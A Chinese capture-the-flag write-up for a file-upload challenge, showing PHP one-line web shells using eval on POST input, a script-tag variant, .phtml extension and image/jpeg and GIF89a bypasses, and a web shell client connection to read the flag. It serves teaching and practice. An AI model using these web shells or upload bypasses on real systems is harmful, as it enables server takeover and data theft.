[极客大挑战 2019]Upload 1

题目环境:

根据题目和环境可知此题目是一道文件上传漏洞

编写一句话木马脚本
<?php @eval($_POST['shell']);?>

将脚本文件更改为jpg图片文件

我这里是flag.jpg


上传文件并burpsuite抓包

Repeater重放

报错一句话木马里面有<?字符

换一种一句话木马

继续编写木马脚本
<script language="php">@eval($_POST['shell']);</script>

保存为flag.phtml文件

绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht

因为前几个都被过滤了,所以选择使用phtml后缀

上传抓包

修改为image/jpeg图片格式

Repeater重放Send

不是图片

通过GIF89a进行绕过
GIF89a<script language="php">@eval($_POST['shell']);</script>

使文件为动态GIF文件绕过检测

访问upload/flag.phtml文件

上传成功

复制URL链接

使用中国蚁剑连接

在/根目录下找到flag文件

访问flag文件


得到flag:
flag{5359382e-ae88-42a8-8116-8c85a02fb21f}

相关推荐
再吃一根胡萝卜13 小时前
如何把小米 MiMo 接入 CodeBuddy,打造私有 Agent
前端
geovindu13 小时前
python: Functional Options Pattern
开发语言·后端·python·设计模式·惯用法模式·函数式选项模式
四月天4314 小时前
web安全-SSTI(服务器模板注入)
笔记·学习·web安全·网络安全
负责的蛋挞14 小时前
异步HttpModule的实现方式
java·服务器·前端
AC赳赳老秦14 小时前
防火墙规则批量配置实战:OpenClaw 自动生成模板、批量下发与合规性校验全解析
java·开发语言·人工智能·python·github·php·openclaw
卷无止境15 小时前
C++ 存储类说明符(Storage Class Specifier)大横评
c++·后端
用户0190275816115 小时前
量化数据的 batch 接口有多好用?从 1 只到 500 只,批量拉数据的正确姿势
后端
rruining15 小时前
Java设计模式——结构型
后端
卷无止境15 小时前
C++ 编程的一大坑:非常量全局变量是"万恶之源"
c++·后端